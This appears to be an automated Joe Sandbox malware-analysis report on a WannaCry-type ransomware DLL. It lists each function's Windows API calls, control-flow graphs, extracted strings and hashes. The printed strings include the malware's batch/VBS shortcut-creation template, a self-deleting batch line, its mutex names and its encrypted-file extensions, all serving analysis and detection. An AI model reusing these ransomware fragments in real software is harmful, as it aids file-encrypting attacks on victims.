                                                            Uniqueness Score: -1.00%

                                                            Function 10003010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 188fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 373 10003010-1000302e call 10006bd0 GetFileAttributesW 376 10003030-1000303b 373->376 377 1000303c-1000303e 373->377 378 10003040-10003044 SetFileAttributesW 377->378 379 1000304a-10003064 CreateFileW 377->379 378->379 380 100030a3-100030bd GetFileSizeEx 379->380 381 10003066-10003071 call 10003000 379->381 383 100030f4-100030fa 380->383 384 100030bf-100030c5 380->384 392 10003073-1000307c 381->392 393 1000307d-10003095 CreateFileW 381->393 385 100030fc 383->385 386 1000310e-10003113 383->386 388 100030d6-100030db 384->388 389 100030c7 384->389 390 10003106-1000310c 385->390 391 100030fe-10003104 385->391 394 10003117-1000312c 386->394 397 100030df-100030f2 call 10004420 388->397 395 100030d0-100030d4 389->395 396 100030c9-100030ce 389->396 390->394 391->386 391->390 393->380 398 10003097-100030a2 393->398 399 1000312e-10003136 394->399 395->397 396->388 396->395 397->399 401 10003161-1000316d 399->401 402 10003138 399->402 406 1000316e-10003193 WriteFile FlushFileBuffers SetFilePointer 401->406 404 10003142-1000315f SetFilePointer 402->404 405 1000313a-10003140 402->405 404->406 405->401 405->404 407 10003195 406->407 408 100031e9-100031ff FindCloseChangeNotification 406->408 409 100031a1-100031ae 407->409 410 10003197-10003199 407->410 411 100031b0 409->411 412 100031ba-100031dd WriteFile 409->412 410->408 413 1000319b 410->413 414 100031b2-100031b4 411->414 415 100031b6-100031b8 411->415 416 1000319d 412->416 417 100031df 412->417 413->409 414->412 414->415 415->412 416->409 417->408 418 100031e1-100031e7 417->418 418->408 418->409
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,7598A390,?,?,10002BEC,?,?,?,10006E59,000000FF,100022E7,?), ref: 10003025
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 10003044
                                                            • CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,00000000,00000000), ref: 10003059
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$Create
                                                            • String ID: UUUU
                                                            • API String ID: 1801647141-1798160573
                                                            • Opcode ID: 14cc93a9fe107791c37b83c4efdcca205c7828bbbc73b4742ae3ba22524b848d
                                                            • Instruction ID: 36e163601d4996daa667a0bb92eb2dba8126ee3049f78d5f23e03fc8b8949e05
                                                            • Opcode Fuzzy Hash: 14cc93a9fe107791c37b83c4efdcca205c7828bbbc73b4742ae3ba22524b848d
                                                            • Instruction Fuzzy Hash: 265115B57043146BF321DB14DC84FAF77DDFBC87D0F108629FA06A6298D735A90486A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004CD0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 88fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 440 10004cd0-10004ce7 GetFileAttributesW 441 10004ce9-10004cf5 CopyFileA 440->441 442 10004cfb-10004d05 GetFileAttributesW 440->442 441->442 443 10004dd9-10004de0 442->443 444 10004d0b-10004d59 GetCurrentDirectoryA 442->444 445 10004d5b-10004d6c 444->445 446 10004d9e-10004dd0 sprintf call 10001140 444->446 445->446 447 10004d6e-10004d9c 445->447 449 10004dd5-10004dd8 446->449 447->446 449->443
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(@WanaDecryptor@.exe,00000000), ref: 10004CE2
                                                            • CopyFileA.KERNEL32(u.wnry,@WanaDecryptor@.exe,00000000), ref: 10004CF5
                                                            • GetFileAttributesW.KERNELBASE(@WanaDecryptor@.exe.lnk), ref: 10004D00
                                                            • GetCurrentDirectoryA.KERNEL32(00000208,?,75AA0F00), ref: 10004D45
                                                            • sprintf.MSVCRT ref: 10004DC2
                                                            Strings
                                                            • @WanaDecryptor@.exe.lnk, xrefs: 10004DAC
                                                            • @WanaDecryptor@.exe, xrefs: 10004CEB, 10004DA2
                                                            • @WanaDecryptor@.exe, xrefs: 10004CDD
                                                            • @echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs, xrefs: 10004D11
                                                            • @WanaDecryptor@.exe.lnk, xrefs: 10004CFB
                                                            • u.wnry, xrefs: 10004CF0
                                                            • \, xrefs: 10004D67
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CopyCurrentDirectorysprintf
                                                            • String ID: @WanaDecryptor@.exe$@WanaDecryptor@.exe$@WanaDecryptor@.exe.lnk$@WanaDecryptor@.exe.lnk$@echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs$\$u.wnry
                                                            • API String ID: 2956617637-4137836058
                                                            • Opcode ID: 1e77d94831eb72cce9ccd5b68757cc63c6d5c9f15047c273025c445cbd2f9ccc
                                                            • Instruction ID: 5eff72be7f3307a573d5bd41d341f535c62de369077b8a2f1d111735481d9547
                                                            • Opcode Fuzzy Hash: 1e77d94831eb72cce9ccd5b68757cc63c6d5c9f15047c273025c445cbd2f9ccc
                                                            • Instruction Fuzzy Hash: A32141364006056AF308D674CC54EEF7B84FBC03A0F104B2EF6AA830E4DEB599088751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10002200 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 83fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Filewcscpy$AttributesDelete_wcsicmpswprintfwcscatwcsrchr
                                                            • String ID: %s%s$.WNCRY$.WNCYR
                                                            • API String ID: 911510130-3396286913
                                                            • Opcode ID: dfbcead6c62649fcd8ccf439d45198f201c0d9040458e4aae6c3cb298bf426c5
                                                            • Instruction ID: 717d28f42427354848a5304481366f48336fdb23f3e673687209add65b969d53
                                                            • Opcode Fuzzy Hash: dfbcead6c62649fcd8ccf439d45198f201c0d9040458e4aae6c3cb298bf426c5
                                                            • Instruction Fuzzy Hash: FC219832444345ABF310EF94DD84DEF73A8EB856E5F00092AFA5592148E739A94D8773
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10001140 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 42fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            • %sdel /a %%0, xrefs: 100011A0
                                                            • @echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs, xrefs: 10001146
                                                            • %d%d.bat, xrefs: 1000116B
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CountTickfclosefopenfprintfrandsprintfsrandtime
                                                            • String ID: %d%d.bat$%sdel /a %%0$@echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs
                                                            • API String ID: 272371283-582203696
                                                            • Opcode ID: aeab48e7f3d4686528c9725e0e16e6881e72156af1ea571a06345f8390d46b4c
                                                            • Instruction ID: bbc73ac05f2c3d766bc92013d972e71024294a5fe7d45ddbd0c21095c0461804
                                                            • Opcode Fuzzy Hash: aeab48e7f3d4686528c9725e0e16e6881e72156af1ea571a06345f8390d46b4c
                                                            • Instruction Fuzzy Hash: B9F08172C00364ABE324ABA88C8DFCB376CBB44385F400400FA4991298D67C52488BE6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004890 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 77processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 471 10004890-1000489e call 10001360 474 100048a0-100048a7 471->474 475 100048a9-10004911 GetFullPathNameA sprintf call 10001080 471->475 474->475 476 10004913-10004967 CreateProcessA 474->476 475->476 480 1000497f-10004986 475->480 479 10004969-1000497e CloseHandle * 2 476->479 476->480 479->480
                                                            APIs
                                                              • Part of subcall function 10001360: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,7598F130), ref: 1000139C
                                                            • GetFullPathNameA.KERNEL32(@WanaDecryptor@.exe,00000208,?,00000000), ref: 100048D3
                                                            • sprintf.MSVCRT ref: 100048F0
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,@WanaDecryptor@.exe,00000000,00000000,00000000), ref: 1000495F
                                                            • CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,@WanaDecryptor@.exe,00000000), ref: 10004975
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,@WanaDecryptor@.exe,00000000,00000000), ref: 1000497C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$AllocateCreateFullInitializeNamePathProcesssprintf
                                                            • String ID: %s %s$@WanaDecryptor@.exe$D$taskse.exe
                                                            • API String ID: 2559560889-706467931
                                                            • Opcode ID: 6b57f88f8648c87f5cce99d721361efec0e800680af71fc62602de8dc9799cd0
                                                            • Instruction ID: da2b5c8f2d4d4c2c4f6f077ca43ea13af02608b477977752943c90fd70028696
                                                            • Opcode Fuzzy Hash: 6b57f88f8648c87f5cce99d721361efec0e800680af71fc62602de8dc9799cd0
                                                            • Instruction Fuzzy Hash: EF218871508341AEF300DB64CC54B9BB7E8EFC4784F01881EF68897295DB75D5048B62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004600 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenMutexA.KERNEL32(00100000,00000001,Global\MsWinZonesCacheCounterMutexW), ref: 10004610
                                                            • CloseHandle.KERNEL32(00000000), ref: 1000461B
                                                            • sprintf.MSVCRT ref: 1000463F
                                                            • CreateMutexA.KERNELBASE(00000000,00000001,?), ref: 10004651
                                                            • GetLastError.KERNEL32 ref: 1000465D
                                                            • CloseHandle.KERNEL32(00000000), ref: 1000466B
                                                            Strings
                                                            • %s%d, xrefs: 10004639
                                                            • Global\MsWinZonesCacheCounterMutexW, xrefs: 10004604
                                                            • Global\MsWinZonesCacheCounterMutexA, xrefs: 10004634
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleMutex$CreateErrorLastOpensprintf
                                                            • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA$Global\MsWinZonesCacheCounterMutexW
                                                            • API String ID: 1504150273-3969049628
                                                            • Opcode ID: e33f24fec5a8105520afc6b73cd36ba1053ed9461139c1998fcfaa31dca5d306
                                                            • Instruction ID: 5a31b93c1da5a20a1b9f141d257786ab794249d41bfd8cb4034ebc3f6a49e628
                                                            • Opcode Fuzzy Hash: e33f24fec5a8105520afc6b73cd36ba1053ed9461139c1998fcfaa31dca5d306
                                                            • Instruction Fuzzy Hash: A3F0A475904321A7F220E7288DC9BDF3754EF407C9F414520F94D922C9FB69E94485A7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10002BA0 Relevance: 15.1, APIs: 10, Instructions: 133fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcslen.MSVCRT ref: 10002BD9
                                                            • EnterCriticalSection.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002BFA
                                                            • wcslen.MSVCRT ref: 10002C15
                                                            • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 10002C23
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 10002C57
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10002CB8
                                                              • Part of subcall function 10003010: GetFileAttributesW.KERNELBASE(?,7598A390,?,?,10002BEC,?,?,?,10006E59,000000FF,100022E7,?), ref: 10003025
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002CD6
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10002CE3
                                                            • wcslen.MSVCRT ref: 10002D04
                                                            • DeleteFileW.KERNELBASE(?,?,10006E59,000000FF,100022E7,?), ref: 10002D12
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CriticalSectionwcslen$FileLeave$??2@??3@AttributesDeleteEnterG@2@@std@@G@std@@Grow@?$basic_string@U?$char_traits@V?$allocator@
                                                            • String ID:
                                                            • API String ID: 784962118-0
                                                            • Opcode ID: 8a941427d0f2c8ed4a11010e4362a52bcd6757f7c924c5409ca1ba2c741ef8f6
                                                            • Instruction ID: 8929200894a3d3d60aeee8930b19ad4408a44741c7842358e38e4ad24ebd9cab
                                                            • Opcode Fuzzy Hash: 8a941427d0f2c8ed4a11010e4362a52bcd6757f7c924c5409ca1ba2c741ef8f6
                                                            • Instruction Fuzzy Hash: 2341BEB29047409BE304DF28CC80AAFF7E9FF88294F44492DF58A83745E735A915CB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10001080 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68processsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 100010D3
                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010EB
                                                            • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 10001121
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 10001128
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Process$Close$ChangeCodeCreateExitFindHandleNotificationObjectSingleTerminateWait
                                                            • String ID: D
                                                            • API String ID: 1516114815-2746444292
                                                            • Opcode ID: bb3f84be8fed6d47b9b6b001cc49eadf72aab307978ea7c8928c43ab0557c935
                                                            • Instruction ID: bf25e3b425067ed05009c6ce0a6326e1c5c349d93b4e77cf05fae7a9ae1fa398
                                                            • Opcode Fuzzy Hash: bb3f84be8fed6d47b9b6b001cc49eadf72aab307978ea7c8928c43ab0557c935
                                                            • Instruction Fuzzy Hash: 1111FCB1514311ABE314CF29CC8499BBBE9FF84790F404919F698C6254D774D845CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10005340 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • fopen.MSVCRT ref: 10005390
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000026B,00000000,00000000), ref: 100053BB
                                                            • fprintf.MSVCRT ref: 100053CC
                                                            • fclose.MSVCRT ref: 100053D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidefclosefopenfprintf
                                                            • String ID: %s$f.wnry
                                                            • API String ID: 3959349042-164597620
                                                            • Opcode ID: fe47b58a0a864098f1ed7e8003c354341eea4e6aa930122578fb3f2d5fa357f5
                                                            • Instruction ID: 734c0e559264cc4d9b0cc5893c3b6f020f9c05ec1f5dab6dea45a35ab53bd0b3
                                                            • Opcode Fuzzy Hash: fe47b58a0a864098f1ed7e8003c354341eea4e6aa930122578fb3f2d5fa357f5
                                                            • Instruction Fuzzy Hash: F4019271608221AFF314EB58CCC8FEE33A4FB84791F10451AF958972D8EBB55800CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: fclose$fopenfreadfwrite
                                                            • String ID: c.wnry
                                                            • API String ID: 2140422903-3240288721
                                                            • Opcode ID: 2fcb7732bd124fd719fd764fef50b0c5215f73a769e972a2100bda7ef1d600a7
                                                            • Instruction ID: 5b66b66c06db25d3a0a81cfd077caa1ea484c652e78dc5caa5dda909e889b54a
                                                            • Opcode Fuzzy Hash: 2fcb7732bd124fd719fd764fef50b0c5215f73a769e972a2100bda7ef1d600a7
                                                            • Instruction Fuzzy Hash: 01F0F631904260ABF330DB29AC48BCB37A4FF803D1F050424FE898629DD6B9CCC5C692
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100013E0 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 1000140A
                                                            • SetEntriesInAclA.ADVAPI32 ref: 1000145E
                                                            • SetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,00000001,00000000), ref: 10001471
                                                            • LocalFree.KERNEL32(?), ref: 10001482
                                                            • LocalFree.KERNEL32(00000001), ref: 10001489
                                                            • LocalFree.KERNEL32(?), ref: 10001490
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: FreeLocal$InfoSecurity$Entries
                                                            • String ID:
                                                            • API String ID: 3140748100-0
                                                            • Opcode ID: 17e72d77cb2a7ab5b29a99238ea31e96b0111bf78f42c6a29ba222225ce2277a
                                                            • Instruction ID: 1eb89440d750b609ffa3c3d638de18f9d51937b2d7303c4cf94103808dea2930
                                                            • Opcode Fuzzy Hash: 17e72d77cb2a7ab5b29a99238ea31e96b0111bf78f42c6a29ba222225ce2277a
                                                            • Instruction Fuzzy Hash: 2E11C7B1919360AFD350CF55CC84E5BBBE9FB88750F404D1EF69993240D7B59508CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10001830 Relevance: 9.1, APIs: 6, Instructions: 61memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GlobalAlloc.KERNELBASE(00000000,00100000,10005340,00000000,75AA0F00,00000000,1000580C,00000000.pky,10005340,1000DD8C,75AA0F10), ref: 10001869
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AllocGlobal
                                                            • String ID:
                                                            • API String ID: 3761449716-0
                                                            • Opcode ID: a0f6333f425ce33925a84890fd78498eb6391ea3f73c7eff5b86457590ab5d7d
                                                            • Instruction ID: 8db7ed3adf78cc50dca048c8c7e3ab3d0c22f95359d44885ef36aa3b35a51b9a
                                                            • Opcode Fuzzy Hash: a0f6333f425ce33925a84890fd78498eb6391ea3f73c7eff5b86457590ab5d7d
                                                            • Instruction Fuzzy Hash: DC118FB66003119BF360DB28EC45FCB77E8EB84790F11882EF649961C8DBB0A845CB75
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10005727 Relevance: 9.1, APIs: 6, Instructions: 58threadsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 10005734
                                                            • Sleep.KERNELBASE(00000BB8), ref: 1000574A
                                                            • GetLogicalDrives.KERNELBASE ref: 10005752
                                                            • CreateThread.KERNEL32(00000000,00000000,10005680,00000003,00000000,00000000), ref: 1000578F
                                                            • CloseHandle.KERNEL32(00000000), ref: 1000579A
                                                            • ExitThread.KERNEL32 ref: 100057B1
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogicalThread$CloseCreateExitHandleSleep
                                                            • String ID:
                                                            • API String ID: 1878306015-0
